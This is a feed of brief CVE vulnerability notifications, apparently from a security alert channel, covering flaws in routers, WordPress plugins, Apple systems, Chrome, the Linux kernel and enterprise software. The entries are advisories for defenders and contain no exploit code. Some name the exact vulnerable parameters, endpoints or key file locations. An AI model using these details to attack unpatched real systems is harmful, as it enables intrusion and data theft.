🚨 CVE-2021-39613D-Link DVG-3104MS version 1.0.2.0.3, 1.0.2.0.4, and 1.0.2.0.4E contains hard-coded credentials for undocumented user accounts in the '/etc/passwd' file. As weak passwords have been used, the plaintext passwords can be recovered from the hash values. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-07-30 15:37:37 |
🚨 CVE-2024-4188Unprotected Transport of Credentials vulnerability in OpenText™ Documentum™ Server could allow Credential Stuffing.This issue affects Documentum™ Server: from 16.7 through 23.4.🎖@cveNotify |
|
| 2024-07-30 15:37:36 |
🚨 CVE-2024-41109Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. Navigating to `/admin/index/statistics` with a logged in Pimcore user exposes information about the Pimcore installation, PHP version, MYSQL version, installed bundles and all database tables and their row count in the system. This vulnerability is fixed in 1.5.2, 1.4.6, and 1.3.10.🎖@cveNotify |
|
| 2024-07-30 15:37:32 |
🚨 CVE-2024-37299Discourse is an open source discussion platform. Prior to 3.2.5 and 3.3.0.beta5, crafting requests to submit very long tag group names can reduce the availability of a Discourse instance. This vulnerability is fixed in 3.2.5 and 3.3.0.beta5.🎖@cveNotify |
|
| 2024-07-30 15:37:31 |
🚨 CVE-2024-40800An input validation issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.6, macOS Monterey 12.7.6, macOS Ventura 13.6.8. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-07-30 15:37:30 |
🚨 CVE-2024-38103Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-07-30 15:37:26 |
🚨 CVE-2024-24621Softaculous Webuzo contains an authentication bypass vulnerability through the password reset functionality. Remote, anonymous attackers can exploit this vulnerability to gain full server access as the root user.🎖@cveNotify |
|
| 2024-07-30 15:37:25 |
🚨 CVE-2024-5217ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-30 15:37:24 |
🚨 CVE-2024-4879ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-30 15:07:24 |
🚨 CVE-2023-39016bboss-persistent v6.0.9 and below was discovered to contain a code injection vulnerability in the component com.frameworkset.common.poolman.util.SQLManager.createPool. This vulnerability is exploited via passing an unchecked argument.🎖@cveNotify |
|
| 2024-07-30 14:37:25 |
🚨 CVE-2024-23091Weak password hashing using MD5 in funzioni.php in HotelDruid before 1.32 allows an attacker to obtain plaintext passwords from hash values.🎖@cveNotify |
|
| 2024-07-30 14:37:24 |
🚨 CVE-2023-45249Remote command execution due to use of default passwords. The following products are affected: Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, Acronis Cyber Infrastructure (ACI) before build 5.1.1-71, Acronis Cyber Infrastructure (ACI) before build 5.2.1-69, Acronis Cyber Infrastructure (ACI) before build 5.3.1-53, Acronis Cyber Infrastructure (ACI) before build 5.4.4-132.🎖@cveNotify |
|
| 2024-07-30 13:37:25 |
🚨 CVE-2024-33365Buffer Overflow vulnerability in Tenda AC10 v4 US_AC10V4.0si_V16.03.10.20_cn allows a remote attacker to execute arbitrary code via the Virtual_Data_Check function in the bin/httpd component.🎖@cveNotify |
|
| 2024-07-30 12:37:24 |
🚨 CVE-2024-7127Improper Neutralization of Input During Web Page Generation vulnerability in Stackposts Social Marketing Tool allows Cross-site Scripting (XSS) attack. By submitting the payload in the username during registration, it can be executed later in the application panel. This could lead to the unauthorised acquisition of information (e.g. cookies from a logged-in user). After multiple attempts to contact the vendor we did not receive any answer. Our team has confirmed the existence of this vulnerability. We suppose this issue affects Social Marketing Tool in all versions.🎖@cveNotify |
|
| 2024-07-30 10:37:25 |
🚨 CVE-2024-41702SiberianCMS - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')🎖@cveNotify |
|
| 2024-07-30 10:37:24 |
🚨 CVE-2024-41701AccuPOS - CWE-200: Exposure of Sensitive Information to an Unauthorized Actor🎖@cveNotify |
|
| 2024-07-30 09:37:42 |
🚨 CVE-2024-7225A vulnerability was found in SourceCodester Insurance Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /Script/admin/core/update_policy of the component Edit Insurance Policy Page. The manipulation of the argument pname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272805 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-30 09:37:37 |
🚨 CVE-2024-41696Priority PRI WEB Portal Add-On for Priority ERP on prem- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor🎖@cveNotify |
|
| 2024-07-30 09:37:36 |
🚨 CVE-2024-41693Mashov - CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)🎖@cveNotify |
|
| 2024-07-30 09:37:31 |
🚨 CVE-2024-40895FFRI AMC versions 3.4.0 to 3.5.3 and some OEM products that implement/bundle FFRI AMC versions 3.4.0 to 3.5.3 allow a remote unauthenticated attacker to execute arbitrary OS commands when certain conditions are met in an environment where the notification program setting is enabled and the executable file path is set to a batch file (.bat) or command file (.cmd) extension.🎖@cveNotify |
|
| 2024-07-30 09:37:30 |
🚨 CVE-2024-38430Matrix - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')🎖@cveNotify |
|
| 2024-07-30 09:37:26 |
🚨 CVE-2023-48396Web Authentication vulnerability in Apache SeaTunnel. Since the jwt key is hardcoded in the application, an attacker can forgeany token to log in any user.Attacker can get secret key in /seatunnel-server/seatunnel-app/src/main/resources/application.yml and then create a token.This issue affects Apache SeaTunnel: 1.0.0.Users are recommended to upgrade to version 1.0.1, which fixes the issue.🎖@cveNotify |
|
| 2024-07-30 09:37:25 |
🚨 CVE-2024-27826The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.6.8, macOS Sonoma 14.5, macOS Monterey 12.7.6, watchOS 10.5, visionOS 1.3, tvOS 17.5, iOS 17.5 and iPadOS 17.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-07-30 09:37:24 |
🚨 CVE-2024-27823A race condition was addressed with improved locking. This issue is fixed in macOS Sonoma 14.5, iOS 16.7.8 and iPadOS 16.7.8, macOS Ventura 13.6.7, watchOS 10.5, visionOS 1.3, tvOS 17.5, iOS 17.5 and iPadOS 17.5, macOS Monterey 12.7.5. An attacker in a privileged network position may be able to spoof network packets.🎖@cveNotify |
|
| 2024-07-30 08:37:27 |
🚨 CVE-2024-42101In the Linux kernel, the following vulnerability has been resolved:drm/nouveau: fix null pointer dereference in nouveau_connector_get_modesIn nouveau_connector_get_modes(), the return value of drm_mode_duplicate()is assigned to mode, which will lead to a possible NULL pointerdereference on failure of drm_mode_duplicate(). Add a check to avoid npd.🎖@cveNotify |
|
| 2024-07-30 08:37:26 |
🚨 CVE-2024-42099In the Linux kernel, the following vulnerability has been resolved:s390/dasd: Fix invalid dereferencing of indirect CCW data pointerFix invalid dereferencing of indirect CCW data pointer indasd_eckd_dump_sense() that leads to a kernel panic in error cases.When using indirect addressing for DASD CCWs (IDAW) the CCW CDA pointerdoes not contain the data address itself but a pointer to the IDAL.This needs to be translated from physical to virtual as well beforeusing it.This dereferencing is also used for dasd_page_cache and also fixedalthough it is very unlikely that this code path ever gets used.🎖@cveNotify |
|
| 2024-07-30 08:37:25 |
🚨 CVE-2023-52888In the Linux kernel, the following vulnerability has been resolved:media: mediatek: vcodec: Only free buffer VA that is not NULLIn the MediaTek vcodec driver, while mtk_vcodec_mem_free() is mostlycalled only when the buffer to free exists, there are some instancesthat didn't do the check and triggered warnings in practice.We believe those checks were forgotten unintentionally. Add the checksback to fix the warnings.🎖@cveNotify |
|
| 2024-07-30 08:37:24 |
🚨 CVE-2024-27884This issue was addressed with a new entitlement. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, visionOS 1.2, tvOS 17.5, iOS 17.5 and iPadOS 17.5. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-07-30 07:37:26 |
🚨 CVE-2024-7222A vulnerability, which was classified as critical, was found in SourceCodester Lot Reservation Management System 1.0. Affected is an unknown function of the file /home.php. The manipulation of the argument type leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272802 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-30 07:37:25 |
🚨 CVE-2024-7100The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bt_bb_button shortcode in all versions up to, and including, 5.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-30 07:37:24 |
🚨 CVE-2024-40094GraphQL Java (aka graphql-java) before 21.5 does not properly consider ExecutableNormalizedFields (ENFs) as part of preventing denial of service via introspection queries. 20.9 and 19.11 are also fixed versions.🎖@cveNotify |
|
| 2024-07-30 06:37:41 |
🚨 CVE-2024-7219A vulnerability classified as critical has been found in SourceCodester School Log Management System 1.0. Affected is an unknown function of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272790 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-30 06:37:40 |
🚨 CVE-2024-6230The پلاگین پرداخت دلخواه WordPress plugin through 2.9.8 does not have CSRF check in place when resetting its form fields, which could allow attackers to make a logged in admin perform such action via a CSRF attack🎖@cveNotify |
|
| 2024-07-30 06:37:36 |
🚨 CVE-2024-6223The Send email only on Reply to My Comment WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-30 06:37:35 |
🚨 CVE-2024-5975The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection🎖@cveNotify |
|
| 2024-07-30 06:37:31 |
🚨 CVE-2024-5808The WP Ajax Contact Form WordPress plugin through 2.2.2 does not have CSRF check in place when deleting emails from the email list, which could allow attackers to make a logged in admin perform such action via a CSRF attack🎖@cveNotify |
|
| 2024-07-30 06:37:30 |
🚨 CVE-2024-4096The Responsive Tabs WordPress plugin through 4.0.8 does not sanitise and escape some of its Tab settings, which could allow high privilege users such as Contributors and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-30 06:37:26 |
🚨 CVE-2024-3669The Web Directory Free WordPress plugin before 1.7.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-07-30 06:37:25 |
🚨 CVE-2024-1287The pmpro-member-directory WordPress plugin before 1.2.6 does not prevent users with at least the contributor role from leaking other users' sensitive information, including password hashes.🎖@cveNotify |
|
| 2024-07-30 06:37:24 |
🚨 CVE-2024-1286The pmpro-membership-maps WordPress plugin before 0.7 does not prevent users with at least the contributor role from leaking sensitive information about users with a membership on the site.🎖@cveNotify |
|
| 2024-07-30 04:37:24 |
🚨 CVE-2024-7215A vulnerability was found in TOTOLINK LR1200 9.3.1cu.2832 and classified as critical. Affected by this issue is the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument host_time leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272786 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-30 03:37:24 |
🚨 CVE-2024-7213A vulnerability, which was classified as critical, was found in TOTOLINK A7000R 9.1.0u.6268_B20220504. Affected is the function setWizardCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ssid leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272784. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-30 02:37:43 |
🚨 CVE-2024-27863An information disclosure issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 17.6 and iPadOS 17.6, watchOS 10.6, tvOS 17.6, visionOS 1.3, macOS Sonoma 14.6. A local attacker may be able to determine kernel memory layout.🎖@cveNotify |
|
| 2024-07-30 02:37:37 |
🚨 CVE-2024-27862A logic issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.6. Enabling Lockdown Mode while setting up a Mac may cause FileVault to become unexpectedly disabled.🎖@cveNotify |
|
| 2024-07-30 02:37:36 |
🚨 CVE-2024-6387A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.🎖@cveNotify |
|
| 2024-07-30 02:37:35 |
🚨 CVE-2024-4558Use after free in ANGLE in Google Chrome prior to 124.0.6367.155 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-07-30 02:37:31 |
🚨 CVE-2024-24795HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.Users are recommended to upgrade to version 2.4.59, which fixes this issue.🎖@cveNotify |
|
| 2024-07-30 02:37:30 |
🚨 CVE-2024-2398When an application tells libcurl it wants to allow HTTP/2 server push, and the amount of received headers for the push surpasses the maximum allowed limit (1000), libcurl aborts the server push. When aborting, libcurl inadvertently does not free all the previously allocated headers and instead leaks the memory. Further, this error condition fails silently and is therefore not easily detected by an application.🎖@cveNotify |
|
| 2024-07-30 02:37:26 |
🚨 CVE-2024-2004When a protocol selection parameter option disables all protocols without adding any then the default set of protocols would remain in the allowed set due to an error in the logic for removing protocols. The below command would perform a request to curl.se with a plaintext protocol which has been explicitly disabled. curl --proto -all,-http http://curl.se The flaw is only present if the set of selected protocols disables the entire set of available protocols, in itself a command with no practical use and therefore unlikely to be encountered in real situations. The curl security team has thus assessed this to be low severity bug.🎖@cveNotify |
|
| 2024-07-30 02:37:25 |
🚨 CVE-2023-27952A race condition was addressed with improved locking. This issue is fixed in macOS Ventura 13.3. An app may bypass Gatekeeper checks.🎖@cveNotify |
|
| 2024-07-30 01:37:25 |
🚨 CVE-2019-20468An issue was discovered in SeTracker2 for TK-Star Q90 Junior GPS horloge 3.1042.9.8656 devices. It has unnecessary permissions such as READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE, and READ_CONTACTS.🎖@cveNotify |
|
| 2024-07-30 01:07:25 |
🚨 CVE-2024-5217ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-30 01:07:24 |
🚨 CVE-2024-4879ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-30 00:37:25 |
🚨 CVE-2024-40817The issue was addressed with improved UI handling. This issue is fixed in macOS Sonoma 14.6, Safari 17.6, macOS Monterey 12.7.6, macOS Ventura 13.6.8. Visiting a website that frames malicious content may lead to UI spoofing.🎖@cveNotify |
|
| 2024-07-30 00:37:24 |
🚨 CVE-2024-40789An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in iOS 16.7.9 and iPadOS 16.7.9, Safari 17.6, iOS 17.6 and iPadOS 17.6, watchOS 10.6, tvOS 17.6, visionOS 1.3, macOS Sonoma 14.6. Processing maliciously crafted web content may lead to an unexpected process crash.🎖@cveNotify |
|
| 2024-07-29 23:37:42 |
🚨 CVE-2024-27884This issue was addressed with a new entitlement. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, visionOS 1.2, tvOS 17.5, iOS 17.5 and iPadOS 17.5. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-07-29 23:37:41 |
🚨 CVE-2024-27882A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.6, macOS Monterey 12.7.6, macOS Ventura 13.6.8. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-07-29 23:37:40 |
🚨 CVE-2024-27881A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.6, macOS Monterey 12.7.6, macOS Ventura 13.6.8. An app may be able to access information about a user’s contacts.🎖@cveNotify |
|
| 2024-07-29 23:37:37 |
🚨 CVE-2024-27878A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.6. An app with root privileges may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-07-29 23:37:36 |
🚨 CVE-2024-27873An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 16.7.9 and iPadOS 16.7.9, macOS Ventura 13.6.8, macOS Monterey 12.7.6, iOS 17.6 and iPadOS 17.6, macOS Sonoma 14.6. Processing a maliciously crafted video file may lead to unexpected app termination.🎖@cveNotify |
|
| 2024-07-29 23:37:35 |
🚨 CVE-2024-27871A path handling issue was addressed with improved validation. This issue is fixed in macOS Sonoma 14.6, iOS 17.6 and iPadOS 17.6. An app may be able to access protected user data.🎖@cveNotify |
|
| 2024-07-29 23:37:31 |
🚨 CVE-2024-27862A logic issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.6. Enabling Lockdown Mode while setting up a Mac may cause FileVault to become unexpectedly disabled.🎖@cveNotify |
|
| 2024-07-29 23:37:30 |
🚨 CVE-2024-27823A race condition was addressed with improved locking. This issue is fixed in macOS Sonoma 14.5, iOS 16.7.8 and iPadOS 16.7.8, macOS Ventura 13.6.7, watchOS 10.5, visionOS 1.3, tvOS 17.5, iOS 17.5 and iPadOS 17.5, macOS Monterey 12.7.5. An attacker in a privileged network position may be able to spoof network packets.🎖@cveNotify |
|
| 2024-07-29 23:37:26 |
🚨 CVE-2024-27809A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.4. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-07-29 23:37:25 |
🚨 CVE-2024-5217ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-29 23:37:24 |
🚨 CVE-2024-4879ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.🎖@cveNotify |
|
| 2024-07-29 22:37:32 |
🚨 CVE-2024-2004When a protocol selection parameter option disables all protocols without adding any then the default set of protocols would remain in the allowed set due to an error in the logic for removing protocols. The below command would perform a request to curl.se with a plaintext protocol which has been explicitly disabled. curl --proto -all,-http http://curl.se The flaw is only present if the set of selected protocols disables the entire set of available protocols, in itself a command with no practical use and therefore unlikely to be encountered in real situations. The curl security team has thus assessed this to be low severity bug.🎖@cveNotify |
|
| 2024-07-29 22:37:26 |
🚨 CVE-2024-23296A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-07-29 22:37:25 |
🚨 CVE-2023-38823Buffer Overflow vulnerability in Tenda Ac19 v.1.0, AC18, AC9 v.1.0, AC6 v.2.0 and v.1.0 allows a remote attacker to execute arbitrary code via the formSetCfm function in bin/httpd.🎖@cveNotify |
|
| 2024-07-29 22:37:24 |
🚨 CVE-2023-27952A race condition was addressed with improved locking. This issue is fixed in macOS Ventura 13.3. An app may bypass Gatekeeper checks.🎖@cveNotify |
|
| 2024-07-29 20:07:26 |
🚨 CVE-2021-38649Open Management Infrastructure Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-29 20:07:25 |
🚨 CVE-2021-38645Open Management Infrastructure Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-29 20:07:24 |
🚨 CVE-2021-36955Windows Common Log File System Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-29 19:37:32 |
🚨 CVE-2024-37858SQL Injection vulnerability in Lost and Found Information System 1.0 allows a remote attacker to escalate privileges via the id parameter to php-lfis/admin/categories/manage_category.php.🎖@cveNotify |
|
| 2024-07-29 19:37:26 |
🚨 CVE-2024-37857SQL Injection vulnerability in Lost and Found Information System 1.0 allows a remote attacker to escalate privileges via id parameter to php-lfis/admin/categories/view_category.php.🎖@cveNotify |
|
| 2024-07-29 19:37:25 |
🚨 CVE-2024-28805An issue was discovered in Italtel i-MCS NFV 12.1.0-20211215. There is Incorrect Access Control.🎖@cveNotify |
|
| 2024-07-29 19:37:24 |
🚨 CVE-2024-28804An issue was discovered in Italtel i-MCS NFV 12.1.0-20211215. Stored Cross-site scripting (XSS) can occur via POST.🎖@cveNotify |
|
| 2024-07-29 19:07:25 |
🚨 CVE-2021-38003Inappropriate implementation in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-07-29 19:07:24 |
🚨 CVE-2021-38000Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 95.0.4638.69 allowed a remote attacker to arbitrarily browser to a malicious URL via a crafted HTML page.🎖@cveNotify |
|
| 2024-07-29 18:37:42 |
🚨 CVE-2024-6726Versions of Delphix Engine prior to Release 25.0.0.0 contain a flaw which results in Remote Code Execution (RCE).🎖@cveNotify |
|
| 2024-07-29 18:37:41 |
🚨 CVE-2024-42098In the Linux kernel, the following vulnerability has been resolved:crypto: ecdh - explicitly zeroize private_keyprivate_key is overwritten with the key parameter passed in by thecaller (if present), or alternatively a newly generated private key.However, it is possible that the caller provides a key (or the newlygenerated key) which is shorter than the previous key. In thatscenario, some key material from the previous key would not beoverwritten. The easiest solution is to explicitly zeroize the entireprivate_key array first.Note that this patch slightly changes the behavior of this function:previously, if the ecc_gen_privkey failed, the old private_key wouldremain. Now, the private_key is always zeroized. This behavior isconsistent with the case where params.key is set and ecc_is_key_validfails.🎖@cveNotify |
|
| 2024-07-29 18:37:38 |
🚨 CVE-2024-42097In the Linux kernel, the following vulnerability has been resolved:ALSA: emux: improve patch ioctl data validationIn load_data(), make the validation of and skipping over the main infoblock match that in load_guspatch().In load_guspatch(), add checking that the specified patch length matchesthe actually supplied data, like load_data() already did.🎖@cveNotify |
|
| 2024-07-29 18:37:37 |
🚨 CVE-2024-42095In the Linux kernel, the following vulnerability has been resolved:serial: 8250_omap: Implementation of Errata i2310As per Errata i2310[0], Erroneous timeout can be triggered,if this Erroneous interrupt is not cleared then it may leadsto storm of interrupts, therefore apply Errata i2310 solution.[0] https://www.ti.com/lit/pdf/sprz536 page 23🎖@cveNotify |
|
| 2024-07-29 18:37:36 |
🚨 CVE-2024-42093In the Linux kernel, the following vulnerability has been resolved:net/dpaa2: Avoid explicit cpumask var allocation on stackFor CONFIG_CPUMASK_OFFSTACK=y kernel, explicit allocation of cpumaskvariable on stack is not recommended since it can cause potential stackoverflow.Instead, kernel code should always use *cpumask_var API(s) to allocatecpumask var in config-neutral way, leaving allocation strategy toCONFIG_CPUMASK_OFFSTACK.Use *cpumask_var API(s) to address it.🎖@cveNotify |
|
| 2024-07-29 18:37:32 |
🚨 CVE-2024-42091In the Linux kernel, the following vulnerability has been resolved:drm/xe: Check pat.ops before dumping PAT settingsWe may leave pat.ops unset when running on brand new platform orwhen running as a VF. While the former is unlikely, the latteris valid (future) use case and will cause NPD when someone willtry to dump PAT settings by debugfs.It's better to check pointer to pat.ops instead of specific .dumphook, as we have this hook always defined for every .ops variant.🎖@cveNotify |
|
| 2024-07-29 18:37:31 |
🚨 CVE-2023-3224Code Injection in GitHub repository nuxt/nuxt prior to 3.5.3.🎖@cveNotify |
|
| 2024-07-29 18:37:30 |
🚨 CVE-2021-28550Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-07-29 18:37:26 |
🚨 CVE-2021-30858A use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-07-29 18:37:25 |
🚨 CVE-2021-30554Use after free in WebGL in Google Chrome prior to 91.0.4472.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-07-29 18:37:24 |
🚨 CVE-2021-30551Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.🎖@cveNotify |
|
| 2024-07-29 18:07:25 |
🚨 CVE-2021-1675Windows Print Spooler Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-29 18:07:24 |
🚨 CVE-2021-28310Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-29 17:37:29 |
🚨 CVE-2024-42084In the Linux kernel, the following vulnerability has been resolved:ftruncate: pass a signed offsetThe old ftruncate() syscall, using the 32-bit off_t misses a signextension when called in compat mode on 64-bit architectures. As aresult, passing a negative length accidentally succeeds in truncatingto file size between 2GiB and 4GiB.Changing the type of the compat syscall to the signed compat_off_tchanges the behavior so it instead returns -EINVAL.The native entry point, the truncate() syscall and the correspondingloff_t based variants are all correct already and do not sufferfrom this mistake.🎖@cveNotify |
|
| 2024-07-29 17:37:26 |
🚨 CVE-2024-33365Buffer Overflow vulnerability in Tenda AC10 v4 US_AC10V4.0si_V16.03.10.20_cn allows a remote attacker to execute arbitrary code via the Virtual_Data_Check function in the bin/httpd component.🎖@cveNotify |
|
| 2024-07-29 17:37:25 |
🚨 CVE-2021-31955Windows Kernel Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-07-29 17:37:24 |
🚨 CVE-2021-31201Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-29 17:07:30 |
🚨 CVE-2024-3978The WordPress Jitsi Shortcode WordPress plugin through 0.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-07-29 17:07:26 |
🚨 CVE-2024-3977The WordPress Jitsi Shortcode WordPress plugin through 0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-07-29 17:07:25 |
🚨 CVE-2024-3966The Pray For Me WordPress plugin through 1.0.4 does not sanitise and escape some parameters, which could unauthenticated visitors to perform Cross-Site Scripting attacks that trigger when an admin visits the Prayer Requests in the WP Admin🎖@cveNotify |
|
| 2024-07-29 17:07:24 |
🚨 CVE-2021-33742Windows MSHTML Platform Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-29 16:37:32 |
🚨 CVE-2024-6984An issue was discovered in Juju that resulted in the leak of the sensitive context ID, which allows a local unprivileged attacker to access other sensitive data or relation accessible to the local charm.🎖@cveNotify |
|
| 2024-07-29 16:37:31 |
🚨 CVE-2024-41022In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: Fix signedness bug in sdma_v4_0_process_trap_irq()The "instance" variable needs to be signed for the error handling to work.🎖@cveNotify |
|
| 2024-07-29 16:37:27 |
🚨 CVE-2024-41021In the Linux kernel, the following vulnerability has been resolved:s390/mm: Fix VM_FAULT_HWPOISON handling in do_exception()There is no support for HWPOISON, MEMORY_FAILURE, or ARCH_HAS_COPY_MC ons390. Therefore we do not expect to see VM_FAULT_HWPOISON indo_exception().However, since commit af19487f00f3 ("mm: make PTE_MARKER_SWAPIN_ERROR moregeneral"), it is possible to see VM_FAULT_HWPOISON in combination withPTE_MARKER_POISONED, even on architectures that do not support HWPOISONotherwise. In this case, we will end up on the BUG() in do_exception().Fix this by treating VM_FAULT_HWPOISON the same as VM_FAULT_SIGBUS, similarto x86 when MEMORY_FAILURE is not configured. Also print unexpected faultflags, for easier debugging.Note that VM_FAULT_HWPOISON_LARGE is not expected, because s390 cannotsupport swap entries on other levels than PTE level.🎖@cveNotify |
|
